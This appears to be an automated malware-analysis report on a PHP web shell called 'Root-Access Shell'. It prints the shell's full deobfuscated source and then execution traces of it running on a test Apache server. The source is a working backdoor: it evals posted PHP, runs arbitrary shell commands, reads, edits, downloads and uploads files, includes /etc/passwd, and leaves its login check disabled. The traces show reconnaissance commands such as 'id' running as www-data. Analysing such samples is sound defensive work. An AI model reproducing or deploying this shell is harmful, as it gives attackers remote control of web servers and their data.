PHP Malware Analysis
root.php
md5: f2a397152a3027652972dc7d825ca992
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- Qurd_Az@Box.AZ (Deobfuscated, HTML, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original, Traces)
Execution
- eval (Deobfuscated, Original)
- exec (Deobfuscated, Original)
- passthru (Deobfuscated, Original)
- shell_exec (Deobfuscated, Original)
- system (Deobfuscated, Original)
Files
- file_get_contents (Deobfuscated, Original)
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
URLs
- http://forum.root-access.ru (Deobfuscated, HTML, Original)
- https://savannah.gnu.org/bugs/?func=additem&group=wget (Traces)
Deobfuscated PHP code
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Qurd_Az_SH3LL</title>
</head>
<body>
<p align="center"><b><font size="6" color="#008000">
<a href="mailto:--------------------------------%3C%20Qurd_Az_SH3ll%20%3C%3C%3C----%3E%3E%3E%20Email:Qurd_Az@Box.AZ%3E%20%3E--------------------------------">
<span style="text-decoration: none">Email : Qurd_Az@Box.Az</span></a></font></b></p>
<p align="center"><b><font size="6" color="#008000">..:: 0wn3R By Qurd_Az ::..</font></b></p>
</body>
</html>
<?php
$auth = 0;
//Auth on/off == 1/0
ini_set("session.gc_maxlifetime", 1);
session_start();
error_reporting(0);
safe_mode();
$name = "63a9f0ea7bb98050796b649e85481845";
//login = "root"
$pass = "9df3b01c60df20d13843841ff0d4482c";
//pass = "access"
if (false) {
if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER']) != $name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW']) != $pass) {
header("WWW-Authenticate: Basic realm=\"PanelAccess\"");
header("HTTP/1.0 401 Unauthorized");
exit("Access Denied");
}
}
if ($_POST['type'] == 11) {
download(stripslashes($_POST['value']));
}
function download($dfilename)
{
$file = fopen($dfilename, "r");
ob_clean();
$filename = basename($dfilename);
$filedump = fread($file, @filesize($dfilename));
fclose($file);
header("Content-type: " . $mime_type);
header("Content-disposition: attachment; filename=\"" . $filename . "\";");
echo $filedump;
}
function testperl()
{
if (ex('perl -h')) {
return "<font size=2 color=#29a329>ON</font>";
} else {
return "<font size=2 color=#ff4500>OFF</font>";
}
}
function view_size($size)
{
if ($size >= 1073741824) {
$size = @round($size / 1073741824 * 100) / 100 . " GB";
} elseif ($size >= 1048576) {
$size = @round($size / 1048576 * 100) / 100 . " MB";
} elseif ($size >= 1024) {
$size = @round($size / 1024 * 100) / 100 . " KB";
} else {
$size .= " B";
}
return $size;
}
function testfetch()
{
if (ex('fetch --help')) {
return "<font size=2 color=#29a329>ON</font>";
} else {
return "<font size=2 color=#ff4500>OFF</font>";
}
}
function testwget()
{
if (ex('wget --help')) {
return "<font size=2 color=#29a329>ON</font>";
} else {
return "<font size=2 color=#ff4500>OFF</font>";
}
}
function oracle()
{
if (function_exists('ocilogon')) {
return "<font size=2 color=#29a329>ON</font>";
} else {
return "<font size=2 color=#ff4500>OFF</font>";
}
}
function postgresql()
{
if (function_exists('pg_connect')) {
return "<font size=2 color=#29a329>ON</font>";
} else {
return "<font size=2 color=#ff4500>OFF</font>";
}
}
function testmssql()
{
if (function_exists('mssql_connect')) {
return "<font size=2 color=#29a329>ON</font>";
} else {
return "<font size=2 color=#ff4500>OFF</font>";
}
}
function testcurl()
{
if (function_exists('curl_version')) {
return "<font size=2 color=#29a329>ON</font>";
} else {
return "<font size=2 color=#ff4500>OFF</font>";
}
}
function testmysql()
{
if (function_exists('mysql_connect')) {
return "<font size=2 color=#29a329>ON</font>";
} else {
return "<font size=2 color=#ff4500>OFF</font>";
}
}
function safe_mode()
{
if (!$safe_mode && strpos(ex("echo abch0ld"), "h0ld") != 3) {
$_SESSION['safe_mode'] = 1;
return "<font size=2 color=#29a329>ON</font>";
} else {
$_SESSION['safe_mode'] = 0;
return "<font size=2 color=#ff4500>OFF</font>";
}
}
function ex($in)
{
$out = '';
if (function_exists('exec')) {
exec($in, $out);
$out = join("\n", $out);
} elseif (function_exists('passthru')) {
ob_start();
passthru($in);
$out = ob_get_contents();
ob_end_clean();
} elseif (function_exists('system')) {
ob_start();
system($in);
$out = ob_get_contents();
ob_end_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = popen($in, "r"))) {
$out = "";
while (!@feof($f)) {
$out .= fread($f, 1024);
}
pclose($f);
}
return $out;
}
function shell()
{
if ($_POST['type'] == 1) {
eval(stripslashes($_POST['value']));
} elseif ($_POST['type'] == 2) {
pwd();
print_r(ex(stripslashes($_POST['value'])));
} elseif ($_POST['type'] == 3) {
if ($_SESSION['safe_mode'] == 1) {
if (($u = safe_ex('ls -la')) != '') {
return $u;
} else {
return safe_ex('dir');
}
} else {
if (($u = ex('ls -la')) != '') {
return $u;
} else {
return ex('dir');
}
}
} elseif ($_POST['type'] == 4) {
if (file_exists(stripslashes($_POST['value']))) {
if ($safe_mode != 1) {
echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']), "rw"), filesize(stripslashes($_POST['value']))));
} else {
echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
}
$_SESSION['edit'] = 1;
$_SESSION['filename'] = $_POST['value'];
} else {
return "File doesn't exists!";
}
} elseif ($_POST['type'] == 5) {
fputs(fopen($_SESSION['filename'], "w"), stripslashes($_POST['value']));
} elseif ($_POST['type'] == 6) {
$uploaddir = pwd();
if (!($name = $_POST['newname'])) {
$name = $_FILES['userfile']['name'];
}
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
} else {
$u = ex('ls -la');
if ($u == '') {
return ex('dir');
} else {
return $u;
}
}
return null;
}
function edit()
{
if ($_SESSION['edit'] == 1) {
$_SESSION['edit'] = 0;
return "<br><center><input type=submit value=\"Save\"></center>";
}
}
function getsystem()
{
return php_uname('s') . " " . php_uname('r') . " " . php_uname('v');
}
function getserver()
{
return getenv("SERVER_SOFTWARE");
}
function getuser()
{
$out = get_current_user();
if ($out != "SYSTEM") {
if (($out = ex('id')) == '') {
$out = "uid=" . getmyuid() . "(" . get_current_user() . ") gid=" . getmygid();
}
}
return $out;
}
function pwd()
{
if ($_POST['type'] == 3) {
$_SESSION['pwd'] = stripslashes($_POST['value']);
}
chdir($_SESSION['pwd']);
$cwd = getcwd();
if ($u = strrpos($cwd, '/')) {
if ($u != strlen($cwd) - 1) {
return $cwd . '/';
} else {
return $cwd;
}
} elseif ($u = strrpos($cwd, '\\')) {
if ($u != strlen($cwd) - 1) {
return $cwd . '\\';
} else {
return $cwd;
}
}
}
function safe_ex($in)
{
if ($in) {
$d = dir('.');
while (false !== ($file = $d->read())) {
if ($file == "." || $file == "..") {
continue;
}
@clearstatcache();
list($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if (!$unix) {
echo date("d.m.Y H:i", $mtime) . " ";
if (@is_dir($file)) {
echo " <DIR> ";
} else {
printf("% 7s ", $size);
}
} else {
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode . " ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ", $nlink, $owner['name'], $grgid['name'], $size);
echo date("d.m.Y H:i ", $mtime);
}
echo "{$file}\n";
}
$d->close();
}
function safe_read($in)
{
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include "/etc/passwd";
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
file_get_contents($in);
}
}
if ($_GET['kill'] == 'done') {
unlink($_SERVER['SCRIPT_FILENAME']);
echo "<script>alert('Your shell script was succefully deleted!')</script>";
}
?>
<html><head><title>Root-Access Shell</title><META http-equiv="Content-Type" content="text/html; charset=CP866">
<style type=text/css>
BODY { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 8px;margin: 0px;padding: 0px;text-align: center;color: #e7e7eb;background-color: #242629;}
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 10px;color: #e7e7eb;}
.contentb {background-color: #44474f;}
.t {padding: 6px;background-color: #242629;}
input,textarea,select
{background: #44474f;
border: 1px solid #242629;
color: #e7e7eb;
font-family: verdana, helvetica, sans-serif;
font-size: 11px;
margin: 5px;
padding: 2px;
vertical-align: middle;}
</style>
<script>
function kill(){
var y;
y = confirm('Do you indeed want to delete web-shell?');
if(y == true){document.location = '?kill=done';}}</script></head><body bgcolor='#242629'><br><center><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Server Info</b></font></th></tr><tr><td class=contentb><table border="0" width="100%"><tr><td width="35%" >System: <font size=1 color=#ff4500><?php
echo getsystem();
?></font></td>
<td width="15%" >PHP-version: <font size=1 color=#29a329><?php
echo phpversion();
?></font></td>
<td width="15%" >Oracle: <?php
echo oracle();
?></td><td width="25%" >Safe_mode: <?php
echo safe_mode();
?></td></tr><tr>
<td width="35%" >Server: <font size=1 color=#ff4500><?php
echo getserver();
?></font></td>
<td width="15%" >MySQL: <?php
echo testmysql();
?></td><td width="15%" >cURL: <?php
echo testcurl();
?></td><td width="25%" >Total space: <?php
echo view_size(disk_total_space(getcwd()));
?></td></tr><tr>
<td width="35%" >PWD: <font size=1 color=#ff4500><?php
if (strlen($u = pwd()) > 45) {
echo "..." . substr($u, strlen($u) - 40, 40);
} else {
echo $u;
}
?></font></td>
<td width="15%" >PostgreSQL: <?php
echo postgresql();
?></td><td width="15%" >WGet: <?php
echo testwget();
?></td><td width="25%" >Free space: <?php
echo view_size(diskfreespace(getcwd()));
?></td></tr><tr>
<td width="35%" >User: <font size=1 color=#ff4500><?php
echo getuser();
?></font></td>
<td width="15%" >MSSQL: <?php
echo testmssql();
?></td><td width="15%" >Perl: <?php
echo testperl();
?></td>
<td width="25%" >Server time: <?php
echo date('H:i d-m-Y');
?></td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Shell</b> <a onclick='kill()'><b><font color="#FF0000">[Kill Shell]</font></b></a></font></th></tr>
<tr><td class=contentb><center><form action method=POST><input type=hidden name="type" value=5><textarea cols=150 rows=20 name="value"><?php
echo htmlspecialchars(shell());
?></textarea><?php
echo edit();
?></form><table border="0" width="100%"><tr><td width="50%" align="center"><form action method=POST>
<b>Enter comand:</b><input type=hidden name="type" value=2><input type=text name="value" size=45><input type=submit value="Enter">
</form></td><td width="50%" align="center"><form action method=POST><b>PWD:</b> <input type=text name="value" size=51 value=<?php
echo pwd();
?>><input type=hidden name="type" value=3><input type=submit value="Enter">
</form></td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Tools</b></font></th></tr>
<tr><td class=contentb><table border="0" width="100%"><tr><td width="50%"><form action method=POST><b>Edit file:</b><input type=hidden name="type" value=4>
<input type=text name="value" size=52 value=<?php
echo pwd();
?>><input type=submit value="Edit"></form></td>
<td width="50%"><form action method=POST><b>Download:</b><input type=hidden name="type" value=11><input type=text name="value" size=51 value=<?php
echo pwd();
?>><input type=submit value="Download">
</form></td></tr><tr><td width="50%"><form action method=POST><b>Run PHP Code:</b>
<input type=hidden name="type" value=1><textarea rows=5 cols=46 name="value"><?php
echo "echo \"Root-Access Shell\";";
?></textarea><input type=submit value="Run code"></form></td>
<td width="50%"><form enctype="multipart/form-data" action method=POST><b>Upload:</b><input type=hidden name="type" value=6>
<input type=file name="userfile" size=40><br><input type=hidden name="type" value=6><b>New name:</b><input type=text size=37 name="newname"><input type=submit value="Upload">
</form></td> </tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Copyright</b></font></th></tr>
<tr><td class=contentb><center><a href="http://forum.root-access.ru"><font size=2 color=#e7e7eb>Root-Access Shell v1.1</font></a></center>
</td></tr></table><br></center></body></html>
<p align="center"><b><font size="4" color="#800000"></font></b></p>Execution traces
data/traces/f2a397152a3027652972dc7d825ca992_trace-1676262443.1799.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:27:49.077804]
1 0 1 0.000251 393512
1 3 0 0.000706 480120 {main} 1 /var/www/html/uploads/root.php 0 0
1 A /var/www/html/uploads/root.php 22 $auth = 0
2 4 0 0.000746 480120 ini_set 0 /var/www/html/uploads/root.php 23 2 'session.gc_maxlifetime' 1
2 4 1 0.000765 480224
2 4 R '1440'
2 5 0 0.000780 480120 session_start 0 /var/www/html/uploads/root.php 24 0
2 5 1 0.000853 480872
2 5 R TRUE
2 6 0 0.000870 480872 error_reporting 0 /var/www/html/uploads/root.php 25 1 0
2 6 1 0.000885 480912
2 6 R 22527
2 7 0 0.000899 480872 safe_mode 1 /var/www/html/uploads/root.php 26 0
3 8 0 0.000913 480872 ex 1 /var/www/html/uploads/root.php 66 1 'echo abch0ld'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 9 0 0.000937 480872 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 9 1 0.000951 480912
4 9 R TRUE
4 10 0 0.000964 480896 exec 0 /var/www/html/uploads/root.php 69 2 'echo abch0ld' ''
4 10 1 0.001741 481400
4 10 R 'abch0ld'
4 11 0 0.001771 481304 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => 'abch0ld']
4 11 1 0.001789 481368
4 11 R 'abch0ld'
3 A /var/www/html/uploads/root.php 69 $out = 'abch0ld'
3 8 1 0.001815 480904
3 8 R 'abch0ld'
3 12 0 0.001829 480904 strpos 0 /var/www/html/uploads/root.php 66 2 'abch0ld' 'h0ld'
3 12 1 0.001843 480976
3 12 R 3
2 A /var/www/html/uploads/root.php 66 _SESSION['safe_mode'] = 0
2 7 1 0.001871 481192
1 A /var/www/html/uploads/root.php 27 $name = '63a9f0ea7bb98050796b649e85481845'
1 A /var/www/html/uploads/root.php 28 $pass = '9df3b01c60df20d13843841ff0d4482c'
2 13 0 0.001909 481192 getsystem 1 /var/www/html/uploads/root.php 157 0
3 14 0 0.001922 481192 php_uname 0 /var/www/html/uploads/root.php 92 1 's'
3 14 1 0.001935 481256
3 14 R 'Linux'
3 15 0 0.001949 481224 php_uname 0 /var/www/html/uploads/root.php 92 1 'r'
3 15 1 0.001961 481304
3 15 R '5.15.0-60-generic'
3 16 0 0.001976 481248 php_uname 0 /var/www/html/uploads/root.php 92 1 'v'
3 16 1 0.001989 481360
3 16 R '#66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023'
2 13 1 0.002005 481288
2 13 R 'Linux 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023'
2 17 0 0.002023 481192 phpversion 0 /var/www/html/uploads/root.php 158 0
2 17 1 0.002035 481256
2 17 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2 18 0 0.002051 481192 oracle 1 /var/www/html/uploads/root.php 159 0
3 19 0 0.002062 481192 function_exists 0 /var/www/html/uploads/root.php 57 1 'ocilogon'
3 19 1 0.002076 481232
3 19 R FALSE
2 18 1 0.002089 481192
2 18 R '<font size=2 color=#ff4500>OFF</font>'
2 20 0 0.002105 481192 safe_mode 1 /var/www/html/uploads/root.php 159 0
3 21 0 0.002117 481192 ex 1 /var/www/html/uploads/root.php 66 1 'echo abch0ld'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 22 0 0.002142 481192 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 22 1 0.002155 481232
4 22 R TRUE
4 23 0 0.002170 481216 exec 0 /var/www/html/uploads/root.php 69 2 'echo abch0ld' ''
4 23 1 0.002850 481720
4 23 R 'abch0ld'
4 24 0 0.002873 481624 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => 'abch0ld']
4 24 1 0.002890 481688
4 24 R 'abch0ld'
3 A /var/www/html/uploads/root.php 69 $out = 'abch0ld'
3 21 1 0.002917 481224
3 21 R 'abch0ld'
3 25 0 0.002930 481224 strpos 0 /var/www/html/uploads/root.php 66 2 'abch0ld' 'h0ld'
3 25 1 0.002944 481296
3 25 R 3
2 A /var/www/html/uploads/root.php 66 _SESSION['safe_mode'] = 0
2 20 1 0.002970 481192
2 20 R '<font size=2 color=#ff4500>OFF</font>'
2 26 0 0.002988 481192 getserver 1 /var/www/html/uploads/root.php 160 0
3 27 0 0.003000 481192 getenv 0 /var/www/html/uploads/root.php 94 1 'SERVER_SOFTWARE'
3 27 1 0.003016 481272
3 27 R 'Apache/2.4.52 (Ubuntu)'
2 26 1 0.003038 481240
2 26 R 'Apache/2.4.52 (Ubuntu)'
2 28 0 0.003054 481192 testmysql 1 /var/www/html/uploads/root.php 161 0
3 29 0 0.003066 481192 function_exists 0 /var/www/html/uploads/root.php 64 1 'mysql_connect'
3 29 1 0.003079 481232
3 29 R FALSE
2 28 1 0.003092 481192
2 28 R '<font size=2 color=#ff4500>OFF</font>'
2 30 0 0.003108 481192 testcurl 1 /var/www/html/uploads/root.php 161 0
3 31 0 0.003120 481192 function_exists 0 /var/www/html/uploads/root.php 62 1 'curl_version'
3 31 1 0.003133 481232
3 31 R TRUE
2 30 1 0.003146 481192
2 30 R '<font size=2 color=#29a329>ON</font>'
2 32 0 0.003163 481192 getcwd 0 /var/www/html/uploads/root.php 161 0
2 32 1 0.003176 481240
2 32 R '/var/www/html/uploads'
2 33 0 0.003190 481240 disk_total_space 0 /var/www/html/uploads/root.php 161 1 '/var/www/html/uploads'
2 33 1 0.003207 481272
2 33 R 232015802368
2 34 0 0.003221 481192 view_size 1 /var/www/html/uploads/root.php 161 1 232015802368
3 35 0 0.003235 481192 round 0 /var/www/html/uploads/root.php 46 1 21608.155441284
3 35 1 0.003248 481224
3 35 R 21608
2 A /var/www/html/uploads/root.php 46 $size = '216.08 GB'
2 34 1 0.003274 481232
2 34 R '216.08 GB'
2 36 0 0.003288 481192 pwd 1 /var/www/html/uploads/root.php 162 0
3 37 0 0.003302 481192 chdir 0 /var/www/html/uploads/root.php 101 1 NULL
3 37 1 0.003325 481280
3 37 R FALSE
3 38 0 0.003339 481240 getcwd 0 /var/www/html/uploads/root.php 102 0
3 38 1 0.003351 481288
3 38 R '/var/www/html/uploads'
2 A /var/www/html/uploads/root.php 102 $cwd = '/var/www/html/uploads'
3 39 0 0.003375 481288 strrpos 0 /var/www/html/uploads/root.php 103 2 '/var/www/html/uploads' '/'
3 39 1 0.003388 481360
3 39 R 13
2 A /var/www/html/uploads/root.php 103 $u = 13
2 36 1 0.003411 481288
2 36 R '/var/www/html/uploads/'
1 A /var/www/html/uploads/root.php 162 $u = '/var/www/html/uploads/'
2 40 0 0.003436 481288 postgresql 1 /var/www/html/uploads/root.php 163 0
3 41 0 0.003447 481288 function_exists 0 /var/www/html/uploads/root.php 59 1 'pg_connect'
3 41 1 0.003460 481328
3 41 R FALSE
2 40 1 0.003472 481288
2 40 R '<font size=2 color=#ff4500>OFF</font>'
2 42 0 0.003488 481288 testwget 1 /var/www/html/uploads/root.php 163 0
3 43 0 0.003506 481288 ex 1 /var/www/html/uploads/root.php 55 1 'wget --help'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 44 0 0.003527 481288 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 44 1 0.003540 481328
4 44 R TRUE
4 45 0 0.003552 481312 exec 0 /var/www/html/uploads/root.php 69 2 'wget --help' ''
4 45 1 0.008176 513848
4 45 R 'and/or open issues at https://savannah.gnu.org/bugs/?func=additem&group=wget.'
4 46 0 0.008230 513672 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => 'GNU Wget 1.21.2, a non-interactive network retriever.', 1 => 'Usage: wget [OPTION]... [URL]...', 2 => '', 3 => 'Mandatory arguments to long options are mandatory for short options too.', 4 => '', 5 => 'Startup:', 6 => ' -V, --version display the version of Wget and exit', 7 => ' -h, --help print this help', 8 => ' -b, --background go to background after startup', 9 => ' -e, --execute=COMMAND execute a `.wgetrc\'-style command', 10 => '', 11 => 'Logging and input file:', 12 => ' -o, --output-file=FILE log messages to FILE', 13 => ' -a, --append-output=FILE append messages to FILE', 14 => ' -d, --debug print lots of debugging information', 15 => ' -q, --quiet quiet (no output)', 16 => ' -v, --verbose be verbose (this is the default)', 17 => ' -nv, --no-verbose turn off verboseness, without being quiet', 18 => ' --report-speed=TYPE output bandwidth as TYPE. TYPE can be bits', 19 => ' -i, --input-file=FILE download URLs found in local or external FILE', 20 => ' -F, --force-html treat input file as HTML', 21 => ' -B, --base=URL resolves HTML input-file links (-i -F)', 22 => ' relative to URL', 23 => ' --config=FILE specify config file to use', 24 => ' --no-config do not read any config file', 25 => ' --rejected-log=FILE log reasons for URL rejection to FILE', 26 => '', 27 => 'Download:', 28 => ' -t, --tries=NUMBER set number of retries to NUMBER (0 unlimits)', 29 => ' --retry-connrefused retry even if connection is refused', 30 => ' --retry-on-http-error=ERRORS comma-separated list of HTTP errors to retry', 31 => ' -O, --output-document=FILE write documents to FILE', 32 => ' -nc, --no-clobber skip downloads that would download to', 33 => ' existing files (overwriting them)', 34 => ' --no-netrc don\'t try to obtain credentials from .netrc', 35 => ' -c, --continue resume getting a partially-downloaded file', 36 => ' --start-pos=OFFSET start downloading from zero-based position OFFSET', 37 => ' --progress=TYPE select progress gauge type', 38 => ' --show-progress display the progress bar in any verbosity mode', 39 => ' -N, --timestamping don\'t re-retrieve files unless newer than', 40 => ' local', 41 => ' --no-if-modified-since don\'t use conditional if-modified-since get', 42 => ' requests in timestamping mode', 43 => ' --no-use-server-timestamps don\'t set the local file\'s timestamp by', 44 => ' the one on the server', 45 => ' -S, --server-response print server response', 46 => ' --spider don\'t download anything', 47 => ' -T, --timeout=SECONDS set all timeout values to SECONDS', 48 => ' --dns-timeout=SECS set the DNS lookup timeout to SECS', 49 => ' --connect-timeout=SECS set the connect timeout to SECS', 50 => ' --read-timeout=SECS set the read timeout to SECS', 51 => ' -w, --wait=SECONDS wait SECONDS between retrievals', 52 => ' (applies if more then 1 URL is to be retrieved)', 53 => ' --waitretry=SECONDS wait 1..SECONDS between retries of a retrieval', 54 => ' (applies if more then 1 URL is to be retrieved)', 55 => ' --random-wait wait from 0.5*WAIT...1.5*WAIT secs between retrievals', 56 => ' (applies if more then 1 URL is to be retrieved)', 57 => ' --no-proxy explicitly turn off proxy', 58 => ' -Q, --quota=NUMBER set retrieval quota to NUMBER', 59 => ' --bind-address=ADDRESS bind to ADDRESS (hostname or IP) on local host', 60 => ' --limit-rate=RATE limit download rate to RATE', 61 => ' --no-dns-cache disable caching DNS lookups', 62 => ' --restrict-file-names=OS restrict chars in file names to ones OS allows', 63 => ' --ignore-case ignore case when matching files/directories', 64 => ' -4, --inet4-only connect only to IPv4 addresses', 65 => ' -6, --inet6-only connect only to IPv6 addresses', 66 => ' --prefer-family=FAMILY connect first to addresses of specified family,', 67 => ' one of IPv6, IPv4, or none', 68 => ' --user=USER set both ftp and http user to USER', 69 => ' --password=PASS set both ftp and http password to PASS', 70 => ' --ask-password prompt for passwords', 71 => ' --use-askpass=COMMAND specify credential handler for requesting', 72 => ' username and password. If no COMMAND is', 73 => ' specified the WGET_ASKPASS or the SSH_ASKPASS', 74 => ' environment variable is used.', 75 => ' --no-iri turn off IRI support', 76 => ' --local-encoding=ENC use ENC as the local encoding for IRIs', 77 => ' --remote-encoding=ENC use ENC as the default remote encoding', 78 => ' --unlink remove file before clobber', 79 => ' --xattr turn on storage of metadata in extended file attributes', 80 => '', 81 => 'Directories:', 82 => ' -nd, --no-directories don\'t create directories', 83 => ' -x, --force-directories force creation of directories', 84 => ' -nH, --no-host-directories don\'t create host directories', 85 => ' --protocol-directories use protocol name in directories', 86 => ' -P, --directory-prefix=PREFIX save files to PREFIX/..', 87 => ' --cut-dirs=NUMBER ignore NUMBER remote directory components', 88 => '', 89 => 'HTTP options:', 90 => ' --http-user=USER set http user to USER', 91 => ' --http-password=PASS set http password to PASS', 92 => ' --no-cache disallow server-cached data', 93 => ' --default-page=NAME change the default page name (normally', 94 => ' this is \'index.html\'.)', 95 => ' -E, --adjust-extension save HTML/CSS documents with proper extensions', 96 => ' --ignore-length ignore \'Content-Length\' header field', 97 => ' --header=STRING insert STRING among the headers', 98 => ' --compression=TYPE choose compression, one of auto, gzip and none. (default: none)', 99 => ' --max-redirect maximum redirections allowed per page', 100 => ' --proxy-user=USER set USER as proxy username', 101 => ' --proxy-password=PASS set PASS as proxy password', 102 => ' --referer=URL include \'Referer: URL\' header in HTTP request', 103 => ' --save-headers save the HTTP headers to file', 104 => ' -U, --user-agent=AGENT identify as AGENT instead of Wget/VERSION', 105 => ' --no-http-keep-alive disable HTTP keep-alive (persistent connections)', 106 => ' --no-cookies don\'t use cookies', 107 => ' --load-cookies=FILE load cookies from FILE before session', 108 => ' --save-cookies=FILE save cookies to FILE after session', 109 => ' --keep-session-cookies load and save session (non-permanent) cookies', 110 => ' --post-data=STRING use the POST method; send STRING as the data', 111 => ' --post-file=FILE use the POST method; send contents of FILE', 112 => ' --method=HTTPMethod use method "HTTPMethod" in the request', 113 => ' --body-data=STRING send STRING as data. --method MUST be set', 114 => ' --body-file=FILE send contents of FILE. --method MUST be set', 115 => ' --content-disposition honor the Content-Disposition header when', 116 => ' choosing local file names (EXPERIMENTAL)', 117 => ' --content-on-error output the received content on server errors', 118 => ' --auth-no-challenge send Basic HTTP authentication information', 119 => ' without first waiting for the server\'s', 120 => ' challenge', 121 => '', 122 => 'HTTPS (SSL/TLS) options:', 123 => ' --secure-protocol=PR choose secure protocol, one of auto, SSLv2,', 124 => ' SSLv3, TLSv1, TLSv1_1, TLSv1_2 and PFS', 125 => ' --https-only only follow secure HTTPS links', 126 => ' --no-check-certificate don\'t validate the server\'s certificate', 127 => ' --certificate=FILE client certificate file', ...]
4 46 1 0.008518 530120
4 46 R 'GNU Wget 1.21.2, a non-interactive network retriever.\nUsage: wget [OPTION]... [URL]...\n\nMandatory arguments to long options are mandatory for short options too.\n\nStartup:\n -V, --version display the version of Wget and exit\n -h, --help print this help\n -b, --background go to background after startup\n -e, --execute=COMMAND execute a `.wgetrc\'-style command\n\nLogging and input file:\n -o, --output-file=FILE log messag'
3 A /var/www/html/uploads/root.php 69 $out = 'GNU Wget 1.21.2, a non-interactive network retriever.\nUsage: wget [OPTION]... [URL]...\n\nMandatory arguments to long options are mandatory for short options too.\n\nStartup:\n -V, --version display the version of Wget and exit\n -h, --help print this help\n -b, --background go to background after startup\n -e, --execute=COMMAND execute a `.wgetrc\'-style command\n\nLogging and input file:\n -o, --output-file=FILE log messag'
3 43 1 0.008608 497672
3 43 R 'GNU Wget 1.21.2, a non-interactive network retriever.\nUsage: wget [OPTION]... [URL]...\n\nMandatory arguments to long options are mandatory for short options too.\n\nStartup:\n -V, --version display the version of Wget and exit\n -h, --help print this help\n -b, --background go to background after startup\n -e, --execute=COMMAND execute a `.wgetrc\'-style command\n\nLogging and input file:\n -o, --output-file=FILE log messag'
2 42 1 0.008650 481288
2 42 R '<font size=2 color=#29a329>ON</font>'
2 47 0 0.008670 481288 getcwd 0 /var/www/html/uploads/root.php 163 0
2 47 1 0.008686 481336
2 47 R '/var/www/html/uploads'
2 48 0 0.008701 481336 diskfreespace 0 /var/www/html/uploads/root.php 163 1 '/var/www/html/uploads'
2 48 1 0.008719 481368
2 48 R 193376878592
2 49 0 0.008734 481288 view_size 1 /var/www/html/uploads/root.php 163 1 193376878592
3 50 0 0.008749 481288 round 0 /var/www/html/uploads/root.php 46 1 18009.625244141
3 50 1 0.008762 481320
3 50 R 18010
2 A /var/www/html/uploads/root.php 46 $size = '180.1 GB'
2 49 1 0.008789 481328
2 49 R '180.1 GB'
2 51 0 0.008803 481288 getuser 1 /var/www/html/uploads/root.php 164 0
3 52 0 0.008815 481288 get_current_user 0 /var/www/html/uploads/root.php 96 0
3 52 1 0.008853 481328
3 52 R 'osboxes'
2 A /var/www/html/uploads/root.php 96 $out = 'osboxes'
3 53 0 0.008879 481328 ex 1 /var/www/html/uploads/root.php 97 1 'id'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 54 0 0.008905 481328 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 54 1 0.008919 481368
4 54 R TRUE
4 55 0 0.008932 481352 exec 0 /var/www/html/uploads/root.php 69 2 'id' ''
4 55 1 0.010595 481952
4 55 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
4 56 0 0.010652 481808 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => 'uid=33(www-data) gid=33(www-data) groups=33(www-data)']
4 56 1 0.010673 481872
4 56 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 A /var/www/html/uploads/root.php 69 $out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 53 1 0.010706 481408
3 53 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 A /var/www/html/uploads/root.php 97 $out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 51 1 0.010735 481376
2 51 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 57 0 0.010755 481296 testmssql 1 /var/www/html/uploads/root.php 165 0
